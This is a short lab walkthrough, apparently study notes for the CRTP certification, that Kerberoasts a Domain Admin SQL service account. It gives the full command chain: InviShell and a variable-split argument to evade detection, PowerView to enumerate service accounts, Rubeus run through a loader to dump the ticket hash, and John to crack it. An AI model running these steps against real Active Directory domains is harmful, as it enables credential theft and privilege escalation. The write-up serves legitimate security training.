CRTP Lab 14

Task

Using the Kerberoast attack, crack password of a SQL server service account.

Since the services running with user accounts have easier passwords to crack than machine accounts, let's find them:

# Run InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Run PowerView
PS C:\AD\Tools>. C:\AD\Tools\PowerView.ps1

# Get Service Accounts
PS C:\AD\Tools> Get-DomainUser -SPN

A service account called "svcadmin" is a Domain Admin and has a SPN set. We can Kerberoast it.

# ArgSplit "kerberoast"
cd C:\AD\Tools
ArgSplit.bat

set "z=t"
set "y=s"
set "x=a"
set "w=o"
set "v=r"
set "u=e"
set "t=b"
set "s=r"
set "r=e"
set "q=k"
set "Pwn=%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"


# Run Rubeus to Kerberoast
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

The saved hash file needs to be modified to be cracked. Ensure you remote ":1433" from the hash file.

Finally, use John to crack hashes.

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

PreviousAS-REP Roast (Kerberoasting)NextTargeted Kerberoasting

Last updated 4 months ago